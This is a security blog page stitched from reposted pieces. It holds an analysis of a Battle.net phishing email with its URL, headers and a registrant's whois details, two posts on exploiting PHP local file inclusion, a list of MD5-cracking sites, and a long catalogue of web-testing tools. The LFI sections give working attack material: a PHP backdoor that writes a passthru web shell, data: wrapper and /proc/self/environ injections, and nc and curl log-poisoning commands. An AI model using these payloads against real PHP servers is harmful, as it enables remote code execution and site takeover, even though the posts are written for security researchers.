from.hell

With Xmass a New wave of WoW fake mails has arrived. And they look quite good to succeed.
It shocked me last night since I viewed the text version without link or full header on my phone.

The mail consist of both a TXT and HTML part.
In text it looks fine:

but the HTML versions contains of course a link to a malicious website, marked red

hxxp://www.battle.net-securelogin-management.com/login/en/login.asp?ref=https%3A%2F%2Fus.battle.net%2Faccount%2Fmanagement%2Fbeta-profile.xml&app=bam

www.battle.net-securelogin-management.com has address 200.63.44.35
Host 35.44.63.200.in-addr.arpa. not found: 3(NXDOMAIN)

17 172 ms 187 ms 196 ms so-3-0-2.usa.pan-pob-edge02.columbus-networks.co
m [63.245.5.145]
18 211 ms 209 ms 208 ms ge-2-0-0.usa.pan-pob-edge01.columbus-networks.co
m [63.245.5.149]
19 210 ms 208 ms 208 ms PANAMASE-38D28A [190.242.68.130]
20 207 ms 208 ms 208 ms 200.63.44.35
Wellcome to Panama =]

http://whois.arin.net/rest/net/NET-200-0-0-0-1

Domain registration info.. hmm rgistered 26.11.2010 looking very “trushworthy” ..


Domain Name: NET-SECURELOGIN-MANAGEMENT.COM
Registrar: HICHINA ZHICHENG TECHNOLOGY LTD.
Whois Server: grs.hichina.com
Referral URL: http://www.net.cn
Name Server: DNS23.HICHINA.COM
Name Server: DNS24.HICHINA.COM
Status: ok
Updated Date: 26-nov-2010
Creation Date: 26-nov-2010
Expiration Date: 26-nov-2011



Registrars.Domain Name ..................... net-securelogin-management.com
Name Server ..................... dns23.hichina.com
dns24.hichina.com
Registrant ID ................... hc061023234-cn
Registrant Name ................. wu an
Registrant Organization ......... wu an bo
Registrant Address .............. henansheng zhengzhoushi
Registrant City ................. zhengzhou
Registrant Province/State ....... HA
Registrant Postal Code .......... 530012
Registrant Country Code ......... CN
Registrant Phone Number ......... +86.037165862108 -
Registrant Fax .................. +86.037165862108 -
Registrant Email ................ mmm123456789@qq.com
Administrative ID ............... hc061023234-cn
Administrative Name ............. wu an
Administrative Organization ..... wu an bo
Administrative Address .......... henansheng zhengzhoushi
Administrative City ............. zhengzhou
Administrative Province/State ... HA
Administrative Postal Code ...... 530012
Administrative Country Code ..... CN
Administrative Phone Number ..... +86.037165862108 -
Administrative Fax .............. +86.037165862108 -
Administrative Email ............ mmm123456789@qq.com
Billing ID ...................... hc061023234-cn
Billing Name .................... wu an
Billing Organization ............ wu an bo
Billing Address ................. henansheng zhengzhoushi
Billing City .................... zhengzhou
Billing Province/State .......... HA
Billing Postal Code ............. 530012
Billing Country Code ............ CN
Billing Phone Number ............ +86.037165862108 -
Billing Fax ..................... +86.037165862108 -
Billing Email ................... mmm123456789@qq.com
Technical ID .................... hc061023234-cn
Technical Name .................. wu an
Technical Organization .......... wu an bo
Technical Address ............... henansheng zhengzhoushi
Technical City .................. zhengzhou
Technical Province/State ........ HA
Technical Postal Code ........... 530012
Technical Country Code .......... CN
Technical Phone Number .......... +86.037165862108 -
Technical Fax ................... +86.037165862108 -
Technical Email ................. mmm123456789@qq.com
Expiration Date ................. 2011-11-26 11:22:22


Mail header:
Return-Path: wcp.com>
Delivered-To:
Received: from localhost (localhost [127.0.0.1])
by hades.hell.sk (Postfix) with ESMTP id 6A9DD22A6
for <>; Sun, 28 Nov 2010 07:37:34 +0100 (CET)
X-Virus-Scanned: Debian amavisd-new at hades.hell.sk
Received: from hades.hell.sk ([127.0.0.1])
by localhost (hades.hell.sk [127.0.0.1]) (amavisd-new, port 10024)
with ESMTP id F-GyfDyCczp6 for ;
Sun, 28 Nov 2010 07:37:33 +0100 (CET)
Received: from wcp.com (213-132-178-164.multikabel.nl [213.132.178.164])
by hades.hell.sk (Postfix) with ESMTP id 687B822A3
for <>; Sun, 28 Nov 2010 07:37:30 +0100 (CET)
Reply-To:
Message-ID: <7EA52D8C342BF823B870791BBCEDBC16@wcp.com>
From: "noreply@blizzard.com"
To: <>
Subject: Battle.net Account - Account Change Notice
Date: Sun, 28 Nov 2010 14:37:41 +0800
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="----=_NextPart_000_059D_0120B3AA.103DB080"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2900.5512
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.5512


Please NEVER click on links in e-mails! =]

Yeah.. migration proces continues well.. wp successfully migrated to hades! =]

I’ve been playing around a lot more with LFI attacks, because I think they’re more prevalent than I originally had expected. Last night I had cigars with one of the OWASP guys and I got to thinking that I should probably do a quick post about this. For those who aren’t clued in about LFI (local file include) attacks, it basically means that PHP is pulling in a file locally and running it (you see that happen a lot with flags like language=en where en represents a file called en.php). So an attack might look like:

http://www.example.com/index.php?language=../../../../../../etc/passwd%00

The null byte is to truncate anything at the end that the php file might be trying to append to the end of the file, like “.php” in “en.php” and so on. Although in that example password files aren’t PHP so it’s not helping you much beyond being able to read files off the file system. So the next step is finding the log files and injecting a PHP backdoor through a user agent or referring URL. There’s some problems with this depending on how you do it because Apache logs will escape quotes. Assuming you find a way around that (like using the error logs rather than the access logs) you can inject your PHP backdoor. Here’s my micro backdoor (thanks to Daniel Herrera for inspiration):

<?php $c=fopen('/tmp/g','w');fwrite($c,'<?php passthru($_GET["f"]);?>');?>

So now what this does is throw a PHP file into the /tmp directory (which is typically writable). More importantly that file can now be used to inject commands directly (in the example below it’s executing whoami):

http://www.example.com/index.php?language=../../../../../../tmp/g%00&f=whoami

If anyone has shorter/more effective LFI backdoor, please let me know and I’ll post them.

from comments:

I have a pretty effective LFI backdoor which won’t require any file loading at all!

Taking advantage of PHP’s RFC 2397 support (http://php.net/manual/en/wrappers.data.php), you can inject the PHP code you want executed directly into the URL. With that said, using your above example:

http://www.example.com/index.php?language=data:,?&cmd=whoami

I’ve tested it out using several methods, including the support for base64 encoding:

Using the base64 encoding, you may be able to shorten your injection pending that they have size restrictions.

Also notice above, when using $_GET[cmd], there aren’t any quotes used. This still works effectively and it comes in handy if the server has magic_quotes enabled

source: http://ha.ckers.org/blog/20100128/micro-php-lfi-backdoor/

This paper exposes the ability from the attacker standpoint to use /proc in order to exploit LFI (Local File Inclusion) vulnerabilities. While using /proc for such aim is well known this one is a specific technique that was not been previously published as far as we know. A tool to automatically exploit LFI using the shown approach is released accordingly.

Update: a third (known) technique has been dissected here: http://www.ush.it/2008/07/09/local-file-inclusion-lfi-of-session-files-to-root-escalation/

LFI2RCE advanced exploitation: /proc shortcuts

On UNIX systems, especially on Linux /proc is the preferred userspace
interface used for a number of things, especially process information.
This article will expose a technique that uses /proc/%{PID}/fd/%{FD_ID}
to implicitly find the location of the logfile containing the attacker’s
payload. Enjoy reading this article by kuza55 and ascii (-;

It’s known that LFI (Local File Inclusion) vulnerabilities can be
exploited in a way that converts them in RCE (Remote Code Execution).

The malicious payload must exist locally, on the filesystem, but since
the attacker is commonly not able to directly upload/create a file,
logs are used. By their intrinsic nature logfiles contain data
that is driven by users (eg: the log will contain user inputs of some
sort). Logfiles that don’t present this behaviour are not valid
candidates.

The trick is to make these logs contain a base payload that will be
later interpreted and executed when the logfile is included. This
technique itself is know from many years (milw0rm.com/exploits/34 is
dated 2003-05-29 but it’s even older).

On a UNIX system multiple logfiles can be used for this scope: xfer log
(“Transfer log”) using specially crafted filenames during FTP transfers,
fail.log using a crafted username and performing a failed login on the
FTP server, etc.

While the path of these files is almost always known (they stay in
/var/ with weak permissions, masked 022) the service could be not
present or unreachable from outside (think of an IP that exposes only
https?). For this reason access_log and error_log are the most used to
perform this type of attack since it’s auto-contained (uses only
resources provided by the webserver, a component that is hardly missing
in this scenario!).

If needed let few commands make things even clearer:

# echo -en "USER evil_payload\nPASS secr3t\n\n" | nc localhost 21
220 (vsFTPd 1.2.3)
331 Please specify the password.
530 Login incorrect.
530 Please login with USER and PASS.
$ cat /var/log/vsftpd.log
Thu Jul 10 02:33:22 2008 [pid 27931] CONNECT: Client "127.0.0.1"
Thu Jul 10 02:33:24 2008 [pid 27930] [evil_payload] FAIL LOGIN: Client "127.0.0.1"
$ curl "http://localhost/index.php?page=../../../var/log/vsftpd.log%00"


Note1: This general concept is often applied to PHP applications but is
valid also on other environments.

Note2: On Windows the story is similar and LFI2RCE conversions still
apply but obviously not the specific /proc technique presented.

To overcome the need to know the location of (access|error)_log (could be
guessable by bruteforcing against a list of known locations or obtained
from configuration files) it’s possible to directly access it by its
file descriptor entry in /proc (a symlink to the real location).

Warning! Achtung! Attenzione! This means that the proposed technique
can’t bypass any filesystem acl. It won’t magically exploit the target.
The “injected” logfile must be readable by the interpreter as in any
normal LFI (for example won’t work on Debian default vhost logs since
they are readable only by root).

Including /proc/31508/fd/5 the lstat64() and readlink() magic will
drive directly to the obscure and hard to guess location of access_log
(/home/www.example.com/private/.rawlogs/access.log in this example).

In this attack the only variables are the process ID of a disposable
apache thread/mod_* and the file descriptor number (with the first three
reserved for stdin,out,err). As said before the process ID must be the
one of some application with an open file descriptor to the target and
Apache satisfies this requirement, this means that in case of mod_* it’s
possible to directly use /proc/self since interpreter execution happens
inside Apache. When CGIs are used it’s possible to go back up to the
Apache PID reading the 4rd column /proc/self/stat (if necessary iterate).

Since mod_php is the common case /proc/self is normally enough to carry
a successful attack, this makes the process uninfluenced by the presence
of Grsec user only /proc for example.

The second variable was the file descriptor number and greatly depends
on the target setup and load since file descriptors can belong to a
range of resources like pipes, sockets and naturally files. Some of the
fd points to logfiles and only two of them are the ones of the target
vhost. At the moment of writing we are unaware of methods to directly
guess the right number but the tool attached to this document speeds up
the process and automatically gives hints on the logfile type and usage.

Note that fd to logfiles are the first opened by apache and this is
especially true for non threaded MPMs like prefork. In such condition
the right fd number mainly depends on the number of vhosts loaded before
the one containing the vulnerable application under attack.

As final attack the right /proc/self/fd/X will be included and the
injected payload executed.

While writing this article and trying to give a complete and accurate
information a paper came to our attention: “LOCAL FILE INCLUSIONS
by G-Brain” (http://www.g-brain.net/tutorials/local-file-inclusions.txt).

It exposes a similar and possibly better technique we were not aware
of that is self-contained (doesn’t require two different stages, one
to inject the payload in the log and one to actually include the
logfile) and non resilient (doesn’t leave any payload in logs).

Summarizing /proc/self/environ contains user inputs (like an env var
named HTTP_USER_AGENT containing the data specified in the User-Agent
request header) that turn it in a useful volatile storage for LFI2RCE
attacks. It also contains other user controlled data beyond UA.


curl "http://example.com/index.php?page=../../../proc/self/environ&cmd=ls"
-H "User-Agent: PHP_RCE: <?php passthru(\$_GET['cmd']) ?>"

The greatest advantage of this attack is that the whole path is static
and known, on the other side I had no luck in making it work on most of
my machines (Failed to open stream: Permission denied).

Now that you known the details of /proc LFI exploitation it’s time to
explain the disadvantages correlated to /proc and the setups exposed
techniques will not work.

Logfiles owned by root and readable only by root: this is the vanilla
setup (at least for Gentoo and Debian) for the default vhost. Experience
teaches us that additional vhosts are often configured manually and
differently. This is possible since the fd’s are opened before dropping
privileges.

Safe mode/openbasedir: if openbasedir is correctly configured /proc is
no more accessible, on the other side logfiles could reside in an
allowed path (ex: open_basedir=/home, access_log at
/home/www.example.com/logs/www_access.log). Note that mass vhoster
clone a “skeletor” when creating new users, so the path to logfiles
could be guessed also by subscribing to the service.

Chroot without proc: the interpreter could run inside a chroot, in this
case /proc could be unexisting or the files linked by proc unreachable.

Grsec user only /proc plus CGI setup: if the interpreter process
belongs to a specific user that is different from the one running Apache
it will be impossible to access /proc/apache_pid/*.

Theoretical details are over, time for the code! To demonstrate our
technique (LFI2RCE using /proc/self/fd) this demo tool has been coded,
it’s in bash, if that disgusts you feel free to convert it into your
favorite language (-;

The tool:

http://ush.it/team/ascii/hack-lfi2rce_proc/lfi2rce.sh

A nice demo for the impatients:

http://ush.it/team/ascii/hack-lfi2rce_proc/lfi2rce.demo.txt

* http://www.g-brain.net/tutorials/local-file-inclusions.txt
Last-Modified: Mon, 24 Mar 2008 12:52:49 GMT

A text version of the above article can be found here: http://ush.it/team/ascii/hack-lfi2rce_proc/lfi2rce.txt

source : http://www.ush.it/2008/08/18/lfi2rce-local-file-inclusion-to-remote-code-execution-advanced-exploitation-proc-shortcuts/

Just a list of online (mostly) md5 crackers but some with do others

This post over on pcsec got me thinking about them.

http://www.pcsec.org/archives/MD5Seacrh-v18-by-mass.html

Of course not all those are working, least not for me.

So here is that list with links and a few others thanks to my twitter homies

passcracking.ru http://passcracking.ru/
md5crack http://md5crack.com/
md5decryption: http://md5decryption.com/
TheKaine.de: http://md5.thekaine.de/
AuthSecu: http://authsecu.com/decrypter-dechiffrer-cracker-hash-md5/decrypter-dechiffrer-cracker-hash-md5.php

hackcrack: http://hashcrack.com/index.php
insidepro: http://hash.insidepro.com/
md5decrypter: http://md5decrypter.com/
md5pass.info: http://md5pass.info/

Bonus points for two of the sites from the screen shot just giving you a parallels plesk login.

Sites specifically mentioned to me in no particular order

Plain-Text.info http://plain-text.info/add/ (also has IRC support)

Hashkiller: http://hashkiller.com/password/
Cryptohaze: http://www.cryptohaze.com/addhashes.php
md5rednoize: http://md5.rednoize.com/
milw0rm: http://milw0rm.com/cracker/insert.php
GData: http://gdataonline.com/seekhash.php
c0llision: http://www.c0llision.net/webcrack.php (also has IRC support)

ISC: http://isc.sans.org/tools/reversehash.html

PassCracking http://passcracking.com/

Lastly, for fun, a metasploit module that submits the hash to md5crack.com and displays the password if its found.

msf auxiliary(md5check_md5crack) > run

[*] Sending 098f6bcd4621d373cade4e832627b4f6 hash to md5crack.com…
[*] plaintext md5 is: test
[*] Auxiliary module execution completed

I started to do more than just md5crack but writing regex’s for different sites just seemed like a waste of time.

http://carnal0wnage.attackresearch.com/sites/default/files/md5check_md5c… (rename to .rb)

repost from: http://carnal0wnage.attackresearch.com/node/402

LiveCDs

OWASP LiveCD Monday, January 29, 2007 4:02 PM 828569600 AOC_Labrat-ALPHA-0010.iso – http://www.packetfocus.com/hackos/
DVL (Damn Vulnerable Linux) – http://www.damnvulnerablelinux.org/
Test sites / testing grounds

SPI Dynamics (live) – http://zero.webappsecurity.com/
Cenzic (live) – http://crackme.cenzic.com/
Watchfire (live) – http://demo.testfire.net/
Acunetix (live) – http://testphp.acunetix.com/ http://testasp.acunetix.com http://testaspnet.acunetix.com
WebMaven / Buggy Bank – http://www.mavensecurity.com/webmaven
Foundstone SASS tools – http://www.foundstone.com/us/resources-free-tools.asp
Updated HackmeBank – http://www.o2-ounceopen.com/technical-info/2008/12/8/updated-version-of-hacmebank.html
OWASP WebGoat – http://www.owasp.org/index.php/OWASP_WebGoat_Project
OWASP SiteGenerator – http://www.owasp.org/index.php/Owasp_SiteGenerator
Stanford SecuriBench – http://suif.stanford.edu/~livshits/securibench/
SecuriBench Micro – http://suif.stanford.edu/~livshits/work/securibench-micro/
HTTP proxying / editing

WebScarab – http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project
Burp – http://www.portswigger.net/
Paros – http://www.parosproxy.org/
Fiddler – http://www.fiddlertool.com/
Web Proxy Editor – http://www.microsoft.com/mspress/companion/0-7356-2187-X/
Pantera – http://www.owasp.org/index.php/Category:OWASP_Pantera_Web_Assessment_Studio_Project
Suru – http://www.sensepost.com/research/suru/
httpedit (curses-based) – http://www.neutralbit.com/en/rd/httpedit/
Charles – http://www.xk72.com/charles/
Odysseus – http://www.bindshell.net/tools/odysseus
Burp, Paros, and WebScarab for Mac OS X – http://www.corsaire.com/downloads/
Web-application scanning tool from `Network Security Tools’/O’Reilly – http://examples.oreilly.com/networkst/
JS Commander – http://jscmd.rubyforge.org/
Ratproxy – http://code.google.com/p/ratproxy/
RSnake’s XSS cheat sheet based-tools, webapp fuzzing, and encoding tools

Wfuzz – http://www.edge-security.com/wfuzz.php
ProxMon – http://www.isecpartners.com/proxmon.html
Wapiti – http://wapiti.sourceforge.net/
Grabber – http://rgaucher.info/beta/grabber/
XSSScan – http://darkcode.ath.cx/scanners/XSSscan.py
CAL9000 – http://www.owasp.org/index.php/Category:OWASP_CAL9000_Project
HTMangLe – http://www.fishnetsecurity.com/Tools/HTMangLe/publish.htm
JBroFuzz – http://sourceforge.net/projects/jbrofuzz
XSSFuzz – http://ha.ckers.org/blog/20060921/xssfuzz-released/
WhiteAcid’s XSS Assistant – http://www.whiteacid.org/greasemonkey/
Overlong UTF – http://www.microsoft.com/mspress/companion/0-7356-2187-X/
[TGZ] MielieTool (SensePost Research) – http://packetstormsecurity.org/UNIX/utilities/mielietools-v1.0.tgz
RegFuzzer: test your regular expression filter – http://rgaucher.info/b/index.php/post/2007/05/26/RegFuzzer%3A-Test-your-regular-expression-filter
screamingCobra – http://www.dachb0den.com/projects/screamingcobra.html
SPIKE and SPIKE Proxy – http://immunitysec.com/resources-freesoftware.shtml
RFuzz – http://rfuzz.rubyforge.org/
WebFuzz – http://www.codebreakers-journal.com/index.php?option=com_content&task=view&id=112&Itemid=99999999
TestMaker – http://www.pushtotest.com/Docs/downloads/features.html
ASP Auditor – http://michaeldaw.org/projects/asp-auditor-v2/
WSTool – http://wstool.sourceforge.net/
Web Hack Control Center (WHCC) – http://ussysadmin.com/whcc/
Web Text Converter – http://www.microsoft.com/mspress/companion/0-7356-2187-X/
HackBar (Firefox Add-on) – https://addons.mozilla.org/firefox/3899/
Net-Force Tools (NF-Tools, Firefox Add-on) – http://www.net-force.nl/library/downloads/
PostIntercepter (Greasemonkey script) – http://userscripts.org/scripts/show/743
HTTP general testing / fingerprinting

Wbox: HTTP testing tool – http://hping.org/wbox/
ht://Check – http://htcheck.sourceforge.net/
Mumsie – http://www.lurhq.com/tools/mumsie.html
WebInject – http://www.webinject.org/
Torture.pl Home Page – http://stein.cshl.org/~lstein/torture/
JoeDog’s Seige – http://www.joedog.org/JoeDog/Siege/
OPEN-LABS: metoscan (http method testing) – http://www.open-labs.org/
Load-balancing detector – http://ge.mine.nu/lbd.html
HMAP – http://ujeni.murkyroc.com/hmap/
Net-Square: httprint – http://net-square.com/httprint/
Wpoison: http stress testing – http://wpoison.sourceforge.net/
Net-square: MSNPawn – http://net-square.com/msnpawn/index.shtml
hcraft: HTTP Vuln Request Crafter – http://druid.caughq.org/projects/hcraft/
rfp.labs: LibWhisker – http://www.wiretrip.net/rfp/lw.asp
Nikto – http://www.cirt.net/code/nikto.shtml
twill – http://twill.idyll.org/
DirBuster – http://www.owasp.org/index.php/Category:OWASP_DirBuster_Project
[ZIP] DFF Scanner – http://security-net.biz/files/dff/DFF.zip
[ZIP] The Elza project – http://packetstormsecurity.org/web/elza-1.4.7-beta.zip http://www.stoev.org/elza.html
HackerFox and Hacking Addons Bundled: Portable Firefox with web hacking addons bundled – http://sf.net/projects/hackfox
Browser-based HTTP tampering / editing / replaying

TamperIE – http://www.bayden.com/Other/
isr-form – http://www.infobyte.com.ar/developments.html
Modify Headers (Firefox Add-on) – http://modifyheaders.mozdev.org/
Tamper Data (Firefox Add-on) – http://tamperdata.mozdev.org/
UrlParams (Firefox Add-on) – https://addons.mozilla.org/en-US/firefox/addon/1290/
TestGen4Web (Firefox Add-on) – https://addons.mozilla.org/en-US/firefox/addon/1385/
DOM Inspector / Inspect This (Firefox Add-on) – https://addons.mozilla.org/en-US/firefox/addon/1806/ https://addons.mozilla.org/en-US/firefox/addon/1913/
LiveHTTPHeaders / Header Monitor (Firefox Add-on) – http://livehttpheaders.mozdev.org/ https://addons.mozilla.org/en-US/firefox/addon/575/
Cookie editing / poisoning

[TGZ] stompy: session id tool – http://lcamtuf.coredump.cx/stompy.tgz
Add’N Edit Cookies (AnEC, Firefox Add-on) – http://addneditcookies.mozdev.org/
CookieCuller (Firefox Add-on) – http://cookieculler.mozdev.org/
CookiePie (Firefox Add-on) – http://www.nektra.com/oss/firefox/extensions/cookiepie/
CookieSpy – http://www.codeproject.com/shell/cookiespy.asp
Cookies Explorer – http://www.dutchduck.com/Features/Cookies.aspx
Ajax and XHR scanning

Sahi – http://sahi.co.in/
scRUBYt – http://scrubyt.org/
jQuery – http://jquery.com/
jquery-include – http://www.gnucitizen.org/projects/jquery-include
Sprajax – http://www.denimgroup.com/sprajax.html
Watir – http://wtr.rubyforge.org/
Watij – http://watij.com/
Watin – http://watin.sourceforge.net/
RBNarcissus – http://idontsmoke.co.uk/2005/rbnarcissus/
SpiderTest (Spider Fuzz plugin) – http://blog.caboo.se/articles/2007/2/21/the-fabulous-spider-fuzz-plugin
Javascript Inline Debugger (jasildbg) – http://jasildbg.googlepages.com/
Firebug Lite – http://www.getfirebug.com/lite.html
firewaitr – http://code.google.com/p/firewatir/
RSS extensions and caching

LiveLines (Firefox Add-on) – https://addons.mozilla.org/en-US/firefox/addon/324/
rss-cache – http://www.dubfire.net/chris/projects/rss-cache/
SQL injection scanning

0×90.org: home of Absinthe, Mezcal, etc – http://0×90.org/releases.php
SQLiX – http://www.owasp.org/index.php/Category:OWASP_SQLiX_Project
sqlninja: a SQL Server injection and takover tool – http://sqlninja.sourceforge.net/
JustinClarke’s SQL Brute – http://www.justinclarke.com/archives/2006/03/sqlbrute.html
BobCat – http://www.northern-monkee.co.uk/projects/bobcat/bobcat.html
sqlmap – http://sqlmap.sourceforge.net/
Scully: SQL Server DB Front-End and Brute-Forcer – http://www.sensepost.com/research/scully/
FG-Injector – http://www.flowgate.net/?lang=en&seccion=herramientas
PRIAMOS – http://www.priamos-project.com/
Web application security malware, backdoors, and evil code

W3AF: Web Application Attack and Audit Framework – http://w3af.sourceforge.net/
Jikto – http://busin3ss.name/jikto-in-the-wild/
XSS Shell – http://ferruh.mavituna.com/article/?1338
XSS-Proxy – http://xss-proxy.sourceforge.net
AttackAPI – http://www.gnucitizen.org/projects/attackapi/
FFsniFF – http://azurit.elbiahosting.sk/ffsniff/
HoneyBlog’s web-based junkyard – http://honeyblog.org/junkyard/web-based/
BeEF – http://www.bindshell.net/tools/beef/
Firefox Extension Scanner (FEX) – http://www.gnucitizen.org/projects/fex/
What is my IP address? – http://reglos.de/myaddress/
xRumer: blogspam automation tool – http://www.botmaster.net/movies/XFull.htm
SpyJax – http://www.merchantos.com/makebeta/tools/spyjax/
Greasecarnaval – http://www.gnucitizen.org/projects/greasecarnaval
Technika – http://www.gnucitizen.org/projects/technika/
Load-AttackAPI bookmarklet – http://www.gnucitizen.org/projects/load-attackapi-bookmarklet
MD’s Projects: JS port scanner, pinger, backdoors, etc – http://michaeldaw.org/my-projects/
Web application services that aid in web application security assessment

Netcraft – http://www.netcraft.net
AboutURL – http://www.abouturl.com/
The Scrutinizer – http://www.scrutinizethis.com/
net.toolkit – http://clez.net/
ServerSniff – http://www.serversniff.net/
Online Microsoft script decoder – http://www.greymagic.com/security/tools/decoder/
Webmaster-Toolkit – http://www.webmaster-toolkit.com/
myIPNeighbbors, et al – http://digg.com/security/MyIPNeighbors_Find_Out_Who_Else_is_Hosted_on_Your_Site_s_IP_Address
PHP charset encoding – http://h4k.in/encoding
data: URL testcases – http://h4k.in/dataurl
Browser-based security fuzzing / checking

Zalewski’s MangleMe – http://lcamtuf.coredump.cx/mangleme/mangle.cgi
hdm’s tools: Hamachi, CSSDIE, DOM-Hanoi, AxMan – http://metasploit.com/users/hdm/tools/
Peach Fuzzer Framework – http://peachfuzz.sourceforge.net/
TagBruteForcer – http://research.eeye.com/html/tools/RT20060801-3.html
PROTOS Test-Suite: c05-http-reply – http://www.ee.oulu.fi/research/ouspg/protos/testing/c05/http-reply/index.html
COMRaider – http://labs.idefense.com
bcheck – http://bcheck.scanit.be/bcheck/
Stop-Phishing: Projects page – http://www.indiana.edu/~phishing/?projects
LinkScanner – http://linkscanner.explabs.com/linkscanner/default.asp
BrowserCheck – http://www.heise-security.co.uk/services/browsercheck/
Cross-browser Exploit Tests – http://www.jungsonnstudios.com/cool.php
Stealing information using DNS pinning demo – http://www.jumperz.net/index.php?i=2&a=1&b=7
Javascript Website Login Checker – http://ha.ckers.org/weird/javascript-website-login-checker.html
Mozilla Activex – http://www.iol.ie/~locka/mozilla/mozilla.htm
Jungsonn’s Black Dragon Project – http://blackdragon.jungsonnstudios.com/
Mr. T (Master Recon Tool, includes Read Firefox Settings PoC) – http://ha.ckers.org/mr-t/
Vulnerable Adobe Plugin Detection For UXSS PoC – http://www.0×000000.com/?i=324
About Flash: is your flash up-to-date? – http://www.macromedia.com/software/flash/about/
Test your installation of Java software – http://java.com/en/download/installed.jsp?detect=jre&try=1
WebPageFingerprint – Light-weight Greasemonkey Fuzzer – http://userscripts.org/scripts/show/30285
PHP static analysis and file inclusion scanning

PHP-SAT.org: Static analysis for PHP – http://www.program-transformation.org/PHP/
Unl0ck Research Team: tool for searching in google for include bugs – http://unl0ck.net/tools.php
FIS: File Inclusion Scanner – http://www.segfault.gr/index.php?cat_id=3&cont_id=25
PHPSecAudit – http://developer.spikesource.com/projects/phpsecaudit
PHP Defensive Tools

PHPInfoSec – Check phpinfo configuration for security – http://phpsec.org/projects/phpsecinfo/

A Greasemonkey Replacement can be found at http://yehg.net/lab/#tools.greasemonkey

Php-Brute-Force-Attack Detector – Detect your web servers being scanned by brute force tools such as WFuzz, OWASP DirBuster and vulnerability scanners such as Nessus, Nikto, Acunetix ..etc. http://yehg.net/lab/pr0js/files.php/php_brute_force_detect.zip

PHP-Login-Info-Checker – Strictly enforce admins/users to select stronger passwords. It tests cracking passwords against 4 rules. It has also built-in smoke test page via url loginfo_checker.php?testlic

http://yehg.net/lab/pr0js/files.php/loginfo_checkerv0.1.zip

http://yehg.net/lab/pr0js/files.php/phploginfo_checker_demo.zip

php-DDOS-Shield – A tricky script to prevent idiot distributed bots which discontinue their flooding attacks by identifying HTTP 503 header code. http://code.google.com/p/ddos-shield/

PHPMySpamFIGHTER – http://yehg.net/lab/pr0js/files.php/phpmyspamfighter.zip http://yehg.net/lab/pr0js/files.php/phpMySpamFighter_demo.rar
Web Application Firewall (WAF) and Intrusion Detection (APIDS) rules and resources

APIDS on Wikipedia – http://en.wikipedia.org/wiki/APIDS
PHP Intrusion Detection System (PHP-IDS) – http://php-ids.org/ http://code.google.com/p/phpids/
dotnetids – http://code.google.com/p/dotnetids/
Secure Science InterScout – http://www.securescience.com/home/newsandevents/news/interscout1.0.html
Remo: whitelist rule editor for mod_security – http://remo.netnea.com/
GotRoot: ModSecuirty rules – http://www.gotroot.com/tiki-index.php?page=mod_security+rules
The Web Security Gateway (WSGW) – http://wsgw.sourceforge.net/
mod_security rules generator – http://noeljackson.com/tools/modsecurity/
Mod_Anti_Tamper – http://www.wisec.it/projects.php?id=3
[TGZ] Automatic Rules Generation for Mod_Security – http://www.wisec.it/rdr.php?fn=/Projects/Rule-o-matic.tgz
AQTRONIX WebKnight – http://www.aqtronix.com/?PageID=99
Akismet: blog spam defense – http://akismet.com/
Samoa: Formal tools for securing web services – http://research.microsoft.com/projects/samoa/
Web services enumeration / scanning / fuzzing

WebServiceStudio2.0 – http://www.codeplex.com/WebserviceStudio
Net-square: wsChess – http://net-square.com/wschess/index.shtml
WSFuzzer – http://www.owasp.org/index.php/Category:OWASP_WSFuzzer_Project
SIFT: web method search tool – http://www.sift.com.au/73/171/sift-web-method-search-tool.htm
iSecPartners: WSMap, WSBang, etc – http://www.isecpartners.com/tools.html
Web application non-specific static source-code analysis

Pixy: a static analysis tool for detecting XSS vulnerabilities – http://www.seclab.tuwien.ac.at/projects/pixy/
Brixoft.Net: Source Edit – http://www.brixoft.net/prodinfo.asp?id=1
Security compass web application auditing tools (SWAAT) – http://www.owasp.org/index.php/Category:OWASP_SWAAT_Project
An even more complete list here – http://www.cs.cmu.edu/~aldrich/courses/654/tools/
A nice list that claims some demos available – http://www.cs.cmu.edu/~aldrich/courses/413/tools.html
A smaller, but also good list – http://spinroot.com/static/
Yasca: A highly extensible source code analysis framework; incorporates several analysis tools into one package. http://www.yasca.org/
Static analysis for C/C++ (CGI, ISAPI, etc) in web applications

RATS – http://www.securesoftware.com/resources/download_rats.html
ITS4 – http://www.cigital.com/its4/
FlawFinder – http://www.dwheeler.com/flawfinder/
Splint – http://www.splint.org/
Uno – http://spinroot.com/uno/
BOON (Buffer Overrun detectiON) – http://www.cs.berkeley.edu/~daw/boon/ http://boon.sourceforge.net
Valgrind – http://www.valgrind.org/
Java static analysis, security frameworks, and web application security tools

LAPSE – http://suif.stanford.edu/~livshits/work/lapse/
HDIV Struts – http://hdiv.org/
Orizon – http://sourceforge.net/projects/orizon/
FindBugs: Find bugs in Java programs – http://findbugs.sourceforge.net/
PMD – http://pmd.sourceforge.net/
CUTE: A Concolic Unit Testing Engine for C and Java – http://osl.cs.uiuc.edu/~ksen/cute/
EMMA – http://emma.sourceforge.net/
JLint – http://jlint.sourceforge.net/
Java PathFinder – http://javapathfinder.sourceforge.net/
Fujaba: Move between UML and Java source code – http://wwwcs.uni-paderborn.de/cs/fujaba/
Checkstyle – http://checkstyle.sourceforge.net/
Cookie Revolver Security Framework – http://sourceforge.net/projects/cookie-revolver
tinapoc – http://sourceforge.net/projects/tinapoc
jarsigner – http://java.sun.com/j2se/1.5.0/docs/tooldocs/solaris/jarsigner.html
Solex – http://solex.sourceforge.net/
Java Explorer – http://metal.hurlant.com/jexplore/
HTTPClient – http://www.innovation.ch/java/HTTPClient/
another HttpClient – http://jakarta.apache.org/commons/httpclient/
a list of code coverage and analysis tools for Java – http://mythinkpond.blogspot.com/2007/06/java-foss-freeopen-source-software.html
Microsoft .NET static analysis and security framework tools, mostly for ASP.NET and ASP.NET AJAX, but also C# and VB.NET

* Visual Studio 2008 Code Analysis, available in:
o VSTS 2008 Development Edition (http://msdn.microsoft.com/vsts2008/products/bb933752.aspx) and
o VSTS 2008 Team Suite (http://msdn.microsoft.com/vsts2008/products/bb933735.aspx)
* Visual Studio 2005 Code Analyzer, available in:
o Visual Studio 2005 Team Edition for Software Developers (http://msdn.microsoft.com/en-us/vstudio/aa718806.aspx)
o Visual Studio 2005 Team Suite (http://msdn.microsoft.com/en-us/vstudio/aa718806.aspx)
